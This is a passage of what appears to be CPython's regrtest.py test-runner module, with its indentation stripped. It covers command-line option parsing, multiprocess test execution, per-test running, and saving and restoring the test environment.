The argument is a comma-separated list of words indicating the
resources to test. Currently only the following are defined:
all - Enable all special resources.
none - Disable all special resources (this is the default).
audio - Tests that use the audio device. (There are known
cases of broken audio drivers that can crash Python or
even the Linux kernel.)
curses - Tests that use curses and will modify the terminal's
state and output modes.
largefile - It is okay to run some test that may create huge
files. These tests can take a long time and may
consume >2GB of disk space temporarily.
network - It is okay to run tests that use external network
resource, e.g. testing SSL support for sockets.
decimal - Test the decimal module against a large suite that
verifies compliance with standards.
cpu - Used for certain CPU-heavy tests.
subprocess Run all tests for the subprocess module.
urlfetch - It is okay to download files required on testing.
gui - Run tests that require a running GUI.
To enable all resources except one, use '-uall,-<resource>'. For
example, to run all the tests except for the gui tests, give the
option '-uall,-gui'.
"""
# We import importlib *ASAP* in order to test #15386
import importlib
import argparse
import builtins
import faulthandler
import io
import json
import locale
import logging
import os
import platform
import random
import re
import shutil
import signal
import sys
import sysconfig
import tempfile
import time
import traceback
import unittest
import warnings
from inspect import isabstract
try:
import threading
except ImportError:
threading = None
try:
import _multiprocessing, multiprocessing.process
except ImportError:
multiprocessing = None
# Some times __path__ and __file__ are not absolute (e.g. while running from
# Lib/) and, if we change the CWD to run the tests in a temporary dir, some
# imports might fail. This affects only the modules imported before os.chdir().
# These modules are searched first in sys.path[0] (so '' -- the CWD) and if
# they are found in the CWD their __file__ and __path__ will be relative (this
# happens before the chdir). All the modules imported after the chdir, are
# not found in the CWD, and since the other paths in sys.path[1:] are absolute
# (site.py absolutize them), the __file__ and __path__ will be absolute too.
# Therefore it is necessary to absolutize manually the __file__ and __path__ of
# the packages to prevent later imports to fail when the CWD is different.
for module in sys.modules.values():
if hasattr(module, '__path__'):
module.__path__ = [os.path.abspath(path) for path in module.__path__]
if hasattr(module, '__file__'):
module.__file__ = os.path.abspath(module.__file__)
# MacOSX (a.k.a. Darwin) has a default stack size that is too small
# for deeply recursive regular expressions. We see this as crashes in
# the Python test suite when running test_re.py and test_sre.py. The
# fix is to set the stack limit to 2048.
# This approach may also be useful for other Unixy platforms that
# suffer from small default stack limits.
if sys.platform == 'darwin':
try:
import resource
except ImportError:
pass
else:
soft, hard = resource.getrlimit(resource.RLIMIT_STACK)
newsoft = min(hard, max(soft, 1024*2048))
resource.setrlimit(resource.RLIMIT_STACK, (newsoft, hard))
# Test result constants.
PASSED = 1
FAILED = 0
ENV_CHANGED = -1
SKIPPED = -2
RESOURCE_DENIED = -3
INTERRUPTED = -4
CHILD_ERROR = -5 # error in a child process
from test import support
RESOURCE_NAMES = ('audio', 'curses', 'largefile', 'network',
'decimal', 'cpu', 'subprocess', 'urlfetch', 'gui')
# When tests are run from the Python build directory, it is best practice
# to keep the test files in a subfolder. This eases the cleanup of leftover
# files using the "make distclean" command.
if sysconfig.is_python_build():
TEMPDIR = os.path.join(sysconfig.get_config_var('srcdir'), 'build')
else:
TEMPDIR = tempfile.gettempdir()
TEMPDIR = os.path.abspath(TEMPDIR)
class _ArgParser(argparse.ArgumentParser):
def error(self, message):
super().error(message + "\nPass -h or --help for complete help.")
def _create_parser():
# Set prog to prevent the uninformative "__main__.py" from displaying in
# error messages when using "python -m test ...".
parser = _ArgParser(prog='regrtest.py',
usage=USAGE,
description=DESCRIPTION,
epilog=EPILOG,
add_help=False,
formatter_class=argparse.RawDescriptionHelpFormatter)
# Arguments with this clause added to its help are described further in
# the epilog's "Additional option details" section.
more_details = ' See the section at bottom for more details.'
group = parser.add_argument_group('General options')
# We add help explicitly to control what argument group it renders under.
group.add_argument('-h', '--help', action='help',
help='show this help message and exit')
group.add_argument('--timeout', metavar='TIMEOUT', type=float,
help='dump the traceback and exit if a test takes '
'more than TIMEOUT seconds; disabled if TIMEOUT '
'is negative or equals to zero')
group.add_argument('--wait', action='store_true',
help='wait for user input, e.g., allow a debugger '
'to be attached')
group.add_argument('--slaveargs', metavar='ARGS')
group.add_argument('-S', '--start', metavar='START',
help='the name of the test at which to start.' +
more_details)
group = parser.add_argument_group('Verbosity')
group.add_argument('-v', '--verbose', action='count',
help='run tests in verbose mode with output to stdout')
group.add_argument('-w', '--verbose2', action='store_true',
help='re-run failed tests in verbose mode')
group.add_argument('-W', '--verbose3', action='store_true',
help='display test output on failure')
group.add_argument('-q', '--quiet', action='store_true',
help='no output unless one or more tests fail')
group.add_argument('-o', '--slow', action='store_true', dest='print_slow',
help='print the slowest 10 tests')
group.add_argument('--header', action='store_true',
help='print header with interpreter info')
group = parser.add_argument_group('Selecting tests')
group.add_argument('-r', '--randomize', action='store_true',
help='randomize test execution order.' + more_details)
group.add_argument('--randseed', metavar='SEED',
dest='random_seed', type=int,
help='pass a random seed to reproduce a previous '
'random run')
group.add_argument('-f', '--fromfile', metavar='FILE',
help='read names of tests to run from a file.' +
more_details)
group.add_argument('-x', '--exclude', action='store_true',
help='arguments are tests to *exclude*')
group.add_argument('-s', '--single', action='store_true',
help='single step through a set of tests.' +
more_details)
group.add_argument('-m', '--match', metavar='PAT',
dest='match_tests',
help='match test cases and methods with glob pattern PAT')
group.add_argument('-G', '--failfast', action='store_true',
help='fail as soon as a test fails (only with -v or -W)')
group.add_argument('-u', '--use', metavar='RES1,RES2,...',
action='append', type=resources_list,
help='specify which special resource intensive tests '
'to run.' + more_details)
group.add_argument('-M', '--memlimit', metavar='LIMIT',
help='run very large memory-consuming tests.' +
more_details)
group.add_argument('--testdir', metavar='DIR',
type=relative_filename,
help='execute test files in the specified directory '
'(instead of the Python stdlib test suite)')
group = parser.add_argument_group('Special runs')
group.add_argument('-l', '--findleaks', action='store_true',
help='if GC is available detect tests that leak memory')
group.add_argument('-L', '--runleaks', action='store_true',
help='run the leaks(1) command just before exit.' +
more_details)
group.add_argument('-R', '--huntrleaks', metavar='RUNCOUNTS',
type=huntrleaks,
help='search for reference leaks (needs debug build, '
'very slow).' + more_details)
group.add_argument('-j', '--multiprocess', metavar='PROCESSES',
dest='use_mp', type=int,
help='run PROCESSES processes at once')
group.add_argument('-T', '--coverage', action='store_true',
dest='trace',
help='turn on code coverage tracing using the trace '
'module')
group.add_argument('-D', '--coverdir', metavar='DIR',
type=relative_filename,
help='directory where coverage files are put')
group.add_argument('-N', '--nocoverdir',
action='store_const', const=None, dest='coverdir',
help='put coverage files alongside modules')
group.add_argument('-t', '--threshold', metavar='THRESHOLD',
type=int,
help='call gc.set_threshold(THRESHOLD)')
group.add_argument('-n', '--nowindows', action='store_true',
help='suppress error message boxes on Windows')
group.add_argument('-F', '--forever', action='store_true',
help='run the specified tests in a loop, until an '
'error happens')
parser.add_argument('args', nargs=argparse.REMAINDER,
help=argparse.SUPPRESS)
return parser
def relative_filename(string):
# CWD is replaced with a temporary dir before calling main(), so we
# join it with the saved CWD so it ends up where the user expects.
return os.path.join(support.SAVEDCWD, string)
def huntrleaks(string):
args = string.split(':')
if len(args) not in (2, 3):
raise argparse.ArgumentTypeError(
'needs 2 or 3 colon-separated arguments')
nwarmup = int(args[0]) if args[0] else 5
ntracked = int(args[1]) if args[1] else 4
fname = args[2] if len(args) > 2 and args[2] else 'reflog.txt'
return nwarmup, ntracked, fname
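# Illustrative note (not part of the original module): how the -R/--huntrleaks
# argument string is parsed by huntrleaks() above, with empty fields falling
# back to the defaults of 5 warmup runs, 4 tracked runs and 'reflog.txt':
#
#     huntrleaks('6:3:leaks.log')  ->  (6, 3, 'leaks.log')
#     huntrleaks('5:4')            ->  (5, 4, 'reflog.txt')
#     huntrleaks(':')              ->  (5, 4, 'reflog.txt')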
def resources_list(string):
u = [x.lower() for x in string.split(',')]
for r in u:
if r == 'all' or r == 'none':
continue
if r[0] == '-':
r = r[1:]
if r not in RESOURCE_NAMES:
raise argparse.ArgumentTypeError('invalid resource: ' + r)
return u
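# Illustrative note (not part of the original module): resources_list() only
# lower-cases and validates the -u/--use value; expansion of 'all'/'none' and
# removal via the '-' prefix happen later in _parse_args():
#
#     resources_list('network,-gui')  ->  ['network', '-gui']
#     resources_list('ALL')           ->  ['all']
#     resources_list('bogus')         ->  raises argparse.ArgumentTypeError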
def _parse_args(args, **kwargs):
# Defaults
ns = argparse.Namespace(testdir=None, verbose=0, quiet=False,
exclude=False, single=False, randomize=False, fromfile=None,
findleaks=False, use_resources=None, trace=False, coverdir='coverage',
runleaks=False, huntrleaks=False, verbose2=False, print_slow=False,
random_seed=None, use_mp=None, verbose3=False, forever=False,
header=False, failfast=False, match_tests=None)
for k, v in kwargs.items():
if not hasattr(ns, k):
raise TypeError('%r is an invalid keyword argument '
'for this function' % k)
setattr(ns, k, v)
if ns.use_resources is None:
ns.use_resources = []
parser = _create_parser()
parser.parse_args(args=args, namespace=ns)
if ns.single and ns.fromfile:
parser.error("-s and -f don't go together!")
if ns.use_mp and ns.trace:
parser.error("-T and -j don't go together!")
if ns.use_mp and ns.findleaks:
parser.error("-l and -j don't go together!")
if ns.use_mp and ns.memlimit:
parser.error("-M and -j don't go together!")
if ns.failfast and not (ns.verbose or ns.verbose3):
parser.error("-G/--failfast needs either -v or -W")
if ns.quiet:
ns.verbose = 0
if ns.timeout is not None:
if hasattr(faulthandler, 'dump_traceback_later'):
if ns.timeout <= 0:
ns.timeout = None
else:
print("Warning: The timeout option requires "
"faulthandler.dump_traceback_later")
ns.timeout = None
if ns.use_mp is not None:
if ns.use_mp <= 0:
# Use all cores + extras for tests that like to sleep
ns.use_mp = 2 + (os.cpu_count() or 1)
if ns.use_mp == 1:
ns.use_mp = None
if ns.use:
for a in ns.use:
for r in a:
if r == 'all':
ns.use_resources[:] = RESOURCE_NAMES
continue
if r == 'none':
del ns.use_resources[:]
continue
remove = False
if r[0] == '-':
remove = True
r = r[1:]
if remove:
if r in ns.use_resources:
ns.use_resources.remove(r)
elif r not in ns.use_resources:
ns.use_resources.append(r)
if ns.random_seed is not None:
ns.randomize = True
return ns
def run_test_in_subprocess(testname, ns):
"""Run the given test in a subprocess with --slaveargs.
ns is the option Namespace parsed from command-line arguments. regrtest
is invoked in a subprocess with the --slaveargs argument; when the
subprocess exits, its return code, stdout and stderr are returned as a
3-tuple.
"""
from subprocess import Popen, PIPE
base_cmd = ([sys.executable] + support.args_from_interpreter_flags() +
['-X', 'faulthandler', '-m', 'test.regrtest'])
slaveargs = (
(testname, ns.verbose, ns.quiet),
dict(huntrleaks=ns.huntrleaks,
use_resources=ns.use_resources,
output_on_failure=ns.verbose3,
timeout=ns.timeout, failfast=ns.failfast,
match_tests=ns.match_tests))
# Running the child from the same working directory as regrtest's original
# invocation ensures that TEMPDIR for the child is the same when
# sysconfig.is_python_build() is true. See issue 15300.
popen = Popen(base_cmd + ['--slaveargs', json.dumps(slaveargs)],
stdout=PIPE, stderr=PIPE,
universal_newlines=True,
close_fds=(os.name != 'nt'),
cwd=support.SAVEDCWD)
stdout, stderr = popen.communicate()
retcode = popen.wait()
return retcode, stdout, stderr
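# Usage sketch (an assumption for illustration, not from the original source):
# in -j mode each worker thread calls this helper with a test name and the
# parsed Namespace, e.g.
#
#     retcode, stdout, stderr = run_test_in_subprocess('test_os', ns)
#
# and then recovers the (result, test_time) pair from the last line of stdout,
# which the slave process prints as JSON.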
def main(tests=None, **kwargs):
"""Execute a test suite.
This also parses command-line options and modifies its behavior
accordingly.
tests -- a list of strings containing test names (optional)
testdir -- the directory in which to look for tests (optional)
Users other than the Python test suite will certainly want to
specify testdir; if it's omitted, the directory containing the
Python test suite is searched for.
If the tests argument is omitted, the tests listed on the
command-line will be used. If that's empty, too, then all *.py
files beginning with test_ will be used.
The other default arguments (verbose, quiet, exclude,
single, randomize, findleaks, use_resources, trace, coverdir,
print_slow, and random_seed) allow programmers calling main()
directly to set the values that would normally be set by flags
on the command line.
"""
# Display the Python traceback on fatal errors (e.g. segfault)
faulthandler.enable(all_threads=True)
# Display the Python traceback on SIGALRM or SIGUSR1 signal
signals = []
if hasattr(signal, 'SIGALRM'):
signals.append(signal.SIGALRM)
if hasattr(signal, 'SIGUSR1'):
signals.append(signal.SIGUSR1)
for signum in signals:
faulthandler.register(signum, chain=True)
replace_stdout()
support.record_original_stdout(sys.stdout)
ns = _parse_args(sys.argv[1:], **kwargs)
if ns.huntrleaks:
# Avoid false positives due to various caches
# filling slowly with random data:
warm_caches()
if ns.memlimit is not None:
support.set_memlimit(ns.memlimit)
if ns.threshold is not None:
import gc
gc.set_threshold(ns.threshold)
if ns.nowindows:
import msvcrt
msvcrt.SetErrorMode(msvcrt.SEM_FAILCRITICALERRORS|
msvcrt.SEM_NOALIGNMENTFAULTEXCEPT|
msvcrt.SEM_NOGPFAULTERRORBOX|
msvcrt.SEM_NOOPENFILEERRORBOX)
try:
msvcrt.CrtSetReportMode
except AttributeError:
# release build
pass
else:
for m in [msvcrt.CRT_WARN, msvcrt.CRT_ERROR, msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(m, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(m, msvcrt.CRTDBG_FILE_STDERR)
if ns.wait:
input("Press any key to continue...")
if ns.slaveargs is not None:
args, kwargs = json.loads(ns.slaveargs)
if kwargs.get('huntrleaks'):
unittest.BaseTestSuite._cleanup = False
try:
result = runtest(*args, **kwargs)
except KeyboardInterrupt:
result = INTERRUPTED, ''
except BaseException as e:
traceback.print_exc()
result = CHILD_ERROR, str(e)
sys.stdout.flush()
print() # Force a newline (just in case)
print(json.dumps(result))
sys.exit(0)
good = []
bad = []
skipped = []
resource_denieds = []
environment_changed = []
interrupted = False
if ns.findleaks:
try:
import gc
except ImportError:
print('No GC available, disabling findleaks.')
ns.findleaks = False
else:
# Uncomment the line below to report garbage that is not
# freeable by reference counting alone. By default only
# garbage that is not collectable by the GC is reported.
#gc.set_debug(gc.DEBUG_SAVEALL)
found_garbage = []
if ns.huntrleaks:
unittest.BaseTestSuite._cleanup = False
if ns.single:
filename = os.path.join(TEMPDIR, 'pynexttest')
try:
with open(filename, 'r') as fp:
next_test = fp.read().strip()
tests = [next_test]
except OSError:
pass
if ns.fromfile:
tests = []
with open(os.path.join(support.SAVEDCWD, ns.fromfile)) as fp:
count_pat = re.compile(r'\[\s*\d+/\s*\d+\]')
for line in fp:
line = count_pat.sub('', line)
guts = line.split() # assuming no test has whitespace in its name
if guts and not guts[0].startswith('#'):
tests.extend(guts)
# Strip .py extensions.
removepy(ns.args)
removepy(tests)
stdtests = STDTESTS[:]
nottests = NOTTESTS.copy()
if ns.exclude:
for arg in ns.args:
if arg in stdtests:
stdtests.remove(arg)
nottests.add(arg)
ns.args = []
# For a partial run, we do not need to clutter the output.
if ns.verbose or ns.header or not (ns.quiet or ns.single or tests or ns.args):
# Print basic platform information
print("==", platform.python_implementation(), *sys.version.split())
print("== ", platform.platform(aliased=True),
"%s-endian" % sys.byteorder)
print("== ", "hash algorithm:", sys.hash_info.algorithm,
"64bit" if sys.maxsize > 2**32 else "32bit")
print("== ", os.getcwd())
print("Testing with flags:", sys.flags)
# if testdir is set, then we are not running the python tests suite, so
# don't add default tests to be executed or skipped (pass empty values)
if ns.testdir:
alltests = findtests(ns.testdir, list(), set())
else:
alltests = findtests(ns.testdir, stdtests, nottests)
selected = tests or ns.args or alltests
if ns.single:
selected = selected[:1]
try:
next_single_test = alltests[alltests.index(selected[0])+1]
except IndexError:
next_single_test = None
# Remove all the selected tests that precede start if it's set.
if ns.start:
try:
del selected[:selected.index(ns.start)]
except ValueError:
print("Couldn't find starting test (%s), using all tests" % ns.start)
if ns.randomize:
if ns.random_seed is None:
ns.random_seed = random.randrange(10000000)
random.seed(ns.random_seed)
print("Using random seed", ns.random_seed)
random.shuffle(selected)
if ns.trace:
import trace, tempfile
tracer = trace.Trace(ignoredirs=[sys.base_prefix, sys.base_exec_prefix,
tempfile.gettempdir()],
trace=False, count=True)
test_times = []
support.verbose = ns.verbose # Tell tests to be moderately quiet
support.use_resources = ns.use_resources
save_modules = sys.modules.keys()
def accumulate_result(test, result):
ok, test_time = result
test_times.append((test_time, test))
if ok == PASSED:
good.append(test)
elif ok == FAILED:
bad.append(test)
elif ok == ENV_CHANGED:
environment_changed.append(test)
elif ok == SKIPPED:
skipped.append(test)
elif ok == RESOURCE_DENIED:
skipped.append(test)
resource_denieds.append(test)
if ns.forever:
def test_forever(tests=list(selected)):
while True:
for test in tests:
yield test
if bad:
return
tests = test_forever()
test_count = ''
test_count_width = 3
else:
tests = iter(selected)
test_count = '/{}'.format(len(selected))
test_count_width = len(test_count) - 1
if ns.use_mp:
try:
from threading import Thread
except ImportError:
print("Multiprocess option requires thread support")
sys.exit(2)
from queue import Queue
debug_output_pat = re.compile(r"\[\d+ refs, \d+ blocks\]$")
output = Queue()
pending = MultiprocessTests(tests)
def work():
# A worker thread.
try:
while True:
try:
test = next(pending)
except StopIteration:
output.put((None, None, None, None))
return
retcode, stdout, stderr = run_test_in_subprocess(test, ns)
# Strip last refcount output line if it exists, since it
# comes from the shutdown of the interpreter in the subcommand.
stderr = debug_output_pat.sub("", stderr)
stdout, _, result = stdout.strip().rpartition("\n")
if retcode != 0:
result = (CHILD_ERROR, "Exit code %s" % retcode)
output.put((test, stdout.rstrip(), stderr.rstrip(), result))
return
if not result:
output.put((None, None, None, None))
return
result = json.loads(result)
output.put((test, stdout.rstrip(), stderr.rstrip(), result))
except BaseException:
output.put((None, None, None, None))
raise
workers = [Thread(target=work) for i in range(ns.use_mp)]
for worker in workers:
worker.start()
finished = 0
test_index = 1
try:
while finished < ns.use_mp:
test, stdout, stderr, result = output.get()
if test is None:
finished += 1
continue
accumulate_result(test, result)
if not ns.quiet:
fmt = "[{1:{0}}{2}/{3}] {4}" if bad else "[{1:{0}}{2}] {4}"
print(fmt.format(
test_count_width, test_index, test_count,
len(bad), test))
if stdout:
print(stdout)
if stderr:
print(stderr, file=sys.stderr)
sys.stdout.flush()
sys.stderr.flush()
if result[0] == INTERRUPTED:
raise KeyboardInterrupt
if result[0] == CHILD_ERROR:
raise Exception("Child error on {}: {}".format(test, result[1]))
test_index += 1
except KeyboardInterrupt:
interrupted = True
pending.interrupted = True
for worker in workers:
worker.join()
else:
for test_index, test in enumerate(tests, 1):
if not ns.quiet:
fmt = "[{1:{0}}{2}/{3}] {4}" if bad else "[{1:{0}}{2}] {4}"
print(fmt.format(
test_count_width, test_index, test_count, len(bad), test))
sys.stdout.flush()
if ns.trace:
                # If we're tracing code coverage, then we don't exit with status
                # on a false return value from main.
tracer.runctx('runtest(test, ns.verbose, ns.quiet, timeout=ns.timeout)',
globals=globals(), locals=vars())
else:
try:
result = runtest(test, ns.verbose, ns.quiet,
ns.huntrleaks,
output_on_failure=ns.verbose3,
timeout=ns.timeout, failfast=ns.failfast,
match_tests=ns.match_tests)
accumulate_result(test, result)
except KeyboardInterrupt:
interrupted = True
break
if ns.findleaks:
gc.collect()
if gc.garbage:
print("Warning: test created", len(gc.garbage), end=' ')
print("uncollectable object(s).")
# move the uncollectable objects somewhere so we don't see
# them again
found_garbage.extend(gc.garbage)
del gc.garbage[:]
# Unload the newly imported modules (best effort finalization)
for module in sys.modules.keys():
if module not in save_modules and module.startswith("test."):
support.unload(module)
if interrupted:
# print a newline after ^C
print()
print("Test suite interrupted by signal SIGINT.")
omitted = set(selected) - set(good) - set(bad) - set(skipped)
print(count(len(omitted), "test"), "omitted:")
printlist(omitted)
if good and not ns.quiet:
if not bad and not skipped and not interrupted and len(good) > 1:
print("All", end=' ')
print(count(len(good), "test"), "OK.")
if ns.print_slow:
test_times.sort(reverse=True)
print("10 slowest tests:")
for time, test in test_times[:10]:
print("%s: %.1fs" % (test, time))
if bad:
print(count(len(bad), "test"), "failed:")
printlist(bad)
if environment_changed:
print("{} altered the execution environment:".format(
count(len(environment_changed), "test")))
printlist(environment_changed)
if skipped and not ns.quiet:
print(count(len(skipped), "test"), "skipped:")
printlist(skipped)
if ns.verbose2 and bad:
print("Re-running failed tests in verbose mode")
for test in bad[:]:
print("Re-running test %r in verbose mode" % test)
sys.stdout.flush()
try:
ns.verbose = True
ok = runtest(test, True, ns.quiet, ns.huntrleaks,
timeout=ns.timeout)
except KeyboardInterrupt:
# print a newline separate from the ^C
print()
break
else:
if ok[0] in {PASSED, ENV_CHANGED, SKIPPED, RESOURCE_DENIED}:
bad.remove(test)
else:
if bad:
print(count(len(bad), 'test'), "failed again:")
printlist(bad)
if ns.single:
if next_single_test:
with open(filename, 'w') as fp:
fp.write(next_single_test + '\n')
else:
os.unlink(filename)
if ns.trace:
r = tracer.results()
r.write_results(show_missing=True, summary=True, coverdir=ns.coverdir)
if ns.runleaks:
os.system("leaks %d" % os.getpid())
sys.exit(len(bad) > 0 or interrupted)
# small set of tests to determine if we have a basically functioning interpreter
# (i.e. if any of these fail, then anything else is likely to follow)
STDTESTS = [
'test_grammar',
'test_opcodes',
'test_dict',
'test_builtin',
'test_exceptions',
'test_types',
'test_unittest',
'test_doctest',
'test_doctest2',
'test_support'
]
# set of tests that we don't want to be executed when using regrtest
NOTTESTS = set()
def findtests(testdir=None, stdtests=STDTESTS, nottests=NOTTESTS):
"""Return a list of all applicable test modules."""
testdir = findtestdir(testdir)
names = os.listdir(testdir)
tests = []
others = set(stdtests) | nottests
for name in names:
mod, ext = os.path.splitext(name)
if mod[:5] == "test_" and ext in (".py", "") and mod not in others:
tests.append(mod)
return stdtests + sorted(tests)
# We do not use a generator so multiple threads can call next().
class MultiprocessTests(object):
"""A thread-safe iterator over tests for multiprocess mode."""
def __init__(self, tests):
self.interrupted = False
self.lock = threading.Lock()
self.tests = tests
def __iter__(self):
return self
def __next__(self):
with self.lock:
if self.interrupted:
raise StopIteration('tests interrupted')
return next(self.tests)
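# Rough usage sketch (an assumption, not from the original source): main()
# wraps the selected tests in this iterator so all -j worker threads can share
# it safely:
#
#     pending = MultiprocessTests(iter(['test_os', 'test_sys']))
#     next(pending)   # 'test_os'  (the lock is held while advancing)
#     next(pending)   # 'test_sys'
#     next(pending)   # raises StopIteration
#
# Setting pending.interrupted = True makes every later next() raise
# StopIteration, which is how a KeyboardInterrupt stops the workers.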
def replace_stdout():
"""Set stdout encoder error handler to backslashreplace (as stderr error
handler) to avoid UnicodeEncodeError when printing a traceback"""
import atexit
stdout = sys.stdout
sys.stdout = open(stdout.fileno(), 'w',
encoding=stdout.encoding,
errors="backslashreplace",
closefd=False,
newline='\n')
def restore_stdout():
sys.stdout.close()
sys.stdout = stdout
atexit.register(restore_stdout)
def runtest(test, verbose, quiet,
huntrleaks=False, use_resources=None,
output_on_failure=False, failfast=False, match_tests=None,
timeout=None):
"""Run a single test.
test -- the name of the test
verbose -- if true, print more messages
quiet -- if true, don't print 'skipped' messages (probably redundant)
huntrleaks -- run multiple times to test for leaks; requires a debug
build; a triple corresponding to -R's three arguments
use_resources -- list of extra resources to use
output_on_failure -- if true, display test output on failure
timeout -- dump the traceback and exit if a test takes more than
timeout seconds
failfast, match_tests -- See regrtest command-line flags for these.
Returns the tuple result, test_time, where result is one of the constants:
INTERRUPTED KeyboardInterrupt when run under -j
RESOURCE_DENIED test skipped because resource denied
SKIPPED test skipped for some other reason
ENV_CHANGED test failed because it changed the execution environment
FAILED test failed
PASSED test passed
"""
if use_resources is not None:
support.use_resources = use_resources
use_timeout = (timeout is not None)
if use_timeout:
faulthandler.dump_traceback_later(timeout, exit=True)
try:
support.match_tests = match_tests
if failfast:
support.failfast = True
if output_on_failure:
support.verbose = True
            # Reuse the same instance for all calls to runtest().  Some
# tests keep a reference to sys.stdout or sys.stderr
# (eg. test_argparse).
if runtest.stringio is None:
stream = io.StringIO()
runtest.stringio = stream
else:
stream = runtest.stringio
stream.seek(0)
stream.truncate()
orig_stdout = sys.stdout
orig_stderr = sys.stderr
try:
sys.stdout = stream
sys.stderr = stream
result = runtest_inner(test, verbose, quiet, huntrleaks,
display_failure=False)
if result[0] == FAILED:
output = stream.getvalue()
orig_stderr.write(output)
orig_stderr.flush()
finally:
sys.stdout = orig_stdout
sys.stderr = orig_stderr
else:
support.verbose = verbose # Tell tests to be moderately quiet
result = runtest_inner(test, verbose, quiet, huntrleaks,
display_failure=not verbose)
return result
finally:
if use_timeout:
faulthandler.cancel_dump_traceback_later()
cleanup_test_droppings(test, verbose)
runtest.stringio = None
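# Usage sketch (an assumption for illustration, not from the original source):
#
#     result, test_time = runtest('test_os', 0, False)
#
# where result is one of the constants documented in the docstring above
# (PASSED, FAILED, SKIPPED, ...) and test_time is the elapsed wall time.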
# Unit tests are supposed to leave the execution environment unchanged
# once they complete. But sometimes tests have bugs, especially when
# tests fail, and the changes to environment go on to mess up other
# tests. This can cause issues with buildbot stability, since tests
# are run in random order and so problems may appear to come and go.
# There are a few things we can save and restore to mitigate this, and
# the following context manager handles this task.
class saved_test_environment:
"""Save bits of the test environment and restore them at block exit.
with saved_test_environment(testname, verbose, quiet):
#stuff
Unless quiet is True, a warning is printed to stderr if any of
the saved items was changed by the test. The attribute 'changed'
is initially False, but is set to True if a change is detected.
If verbose is more than 1, the before and after state of changed
items is also printed.
"""
changed = False
def __init__(self, testname, verbose=0, quiet=False):
self.testname = testname
self.verbose = verbose
self.quiet = quiet
# To add things to save and restore, add a name XXX to the resources list
# and add corresponding get_XXX/restore_XXX functions. get_XXX should
# return the value to be saved and compared against a second call to the
# get function when test execution completes. restore_XXX should accept
# the saved value and restore the resource using it. It will be called if
# and only if a change in the value is detected.
#
# Note: XXX will have any '.' replaced with '_' characters when determining
# the corresponding method names.
resources = ('sys.argv', 'cwd', 'sys.stdin', 'sys.stdout', 'sys.stderr',
'os.environ', 'sys.path', 'sys.path_hooks', '__import__',
'warnings.filters', 'asyncore.socket_map',
'logging._handlers', 'logging._handlerList', 'sys.gettrace',
'sys.warnoptions',
# multiprocessing.process._cleanup() may release ref
# to a thread, so check processes first.
'multiprocessing.process._dangling', 'threading._dangling',
'sysconfig._CONFIG_VARS', 'sysconfig._INSTALL_SCHEMES',
'files', 'locale', 'warnings.showwarning',
)
def get_sys_argv(self):
return id(sys.argv), sys.argv, sys.argv[:]
def restore_sys_argv(self, saved_argv):
sys.argv = saved_argv[1]
sys.argv[:] = saved_argv[2]
def get_cwd(self):
return os.getcwd()
def restore_cwd(self, saved_cwd):
os.chdir(saved_cwd)
def get_sys_stdout(self):
return sys.stdout
def restore_sys_stdout(self, saved_stdout):
sys.stdout = saved_stdout
def get_sys_stderr(self):
return sys.stderr
def restore_sys_stderr(self, saved_stderr):
sys.stderr = saved_stderr
def get_sys_stdin(self):
return sys.stdin
def restore_sys_stdin(self, saved_stdin):
sys.stdin = saved_stdin
def get_os_environ(self):
return id(os.environ), os.environ, dict(os.environ)
def restore_os_environ(self, saved_environ):
os.environ = saved_environ[1]
os.environ.clear()
os.environ.update(saved_environ[2])
def get_sys_path(self):
return id(sys.path), sys.path, sys.path[:]
def restore_sys_path(self, saved_path):
sys.path = saved_path[1]
sys.path[:] = saved_path[2]
def get_sys_path_hooks(self):
return id(sys.path_hooks), sys.path_hooks, sys.path_hooks[:]
def restore_sys_path_hooks(self, saved_hooks):
sys.path_hooks = saved_hooks[1]
sys.path_hooks[:] = saved_hooks[2]
def get_sys_gettrace(self):
return sys.gettrace()
def restore_sys_gettrace(self, trace_fxn):
sys.settrace(trace_fxn)
def get___import__(self):
return builtins.__import__
def restore___import__(self, import_):
builtins.__import__ = import_
def get_warnings_filters(self):
return id(warnings.filters), warnings.filters, warnings.filters[:]
def restore_warnings_filters(self, saved_filters):
warnings.filters = saved_filters[1]
warnings.filters[:] = saved_filters[2]
def get_asyncore_socket_map(self):
asyncore = sys.modules.get('asyncore')
# XXX Making a copy keeps objects alive until __exit__ gets called.
return asyncore and asyncore.socket_map.copy() or {}
def restore_asyncore_socket_map(self, saved_map):
asyncore = sys.modules.get('asyncore')
if asyncore is not None:
asyncore.close_all(ignore_all=True)
asyncore.socket_map.update(saved_map)
def get_shutil_archive_formats(self):
        # we could call get_archive_formats() but that only returns the
        # registry keys; we want to check the values too (the functions that
        # are registered)
return shutil._ARCHIVE_FORMATS, shutil._ARCHIVE_FORMATS.copy()
def restore_shutil_archive_formats(self, saved):
shutil._ARCHIVE_FORMATS = saved[0]
shutil._ARCHIVE_FORMATS.clear()
shutil._ARCHIVE_FORMATS.update(saved[1])
def get_shutil_unpack_formats(self):
return shutil._UNPACK_FORMATS, shutil._UNPACK_FORMATS.copy()
def restore_shutil_unpack_formats(self, saved):
shutil._UNPACK_FORMATS = saved[0]
shutil._UNPACK_FORMATS.clear()
shutil._UNPACK_FORMATS.update(saved[1])
def get_logging__handlers(self):
# _handlers is a WeakValueDictionary
return id(logging._handlers), logging._handlers, logging._handlers.copy()
def restore_logging__handlers(self, saved_handlers):
# Can't easily revert the logging state
pass
def get_logging__handlerList(self):
# _handlerList is a list of weakrefs to handlers
return id(logging._handlerList), logging._handlerList, logging._handlerList[:]
def restore_logging__handlerList(self, saved_handlerList):
# Can't easily revert the logging state
pass
def get_sys_warnoptions(self):
return id(sys.warnoptions), sys.warnoptions, sys.warnoptions[:]
def restore_sys_warnoptions(self, saved_options):
sys.warnoptions = saved_options[1]
sys.warnoptions[:] = saved_options[2]
# Controlling dangling references to Thread objects can make it easier
# to track reference leaks.
def get_threading__dangling(self):
if not threading:
return None
# This copies the weakrefs without making any strong reference
return threading._dangling.copy()
def restore_threading__dangling(self, saved):
if not threading:
return
threading._dangling.clear()
threading._dangling.update(saved)
# Same for Process objects
def get_multiprocessing_process__dangling(self):
if not multiprocessing:
return None
# Unjoined process objects can survive after process exits
multiprocessing.process._cleanup()
# This copies the weakrefs without making any strong reference
return multiprocessing.process._dangling.copy()
def restore_multiprocessing_process__dangling(self, saved):
if not multiprocessing:
return
multiprocessing.process._dangling.clear()
multiprocessing.process._dangling.update(saved)
def get_sysconfig__CONFIG_VARS(self):
# make sure the dict is initialized
sysconfig.get_config_var('prefix')
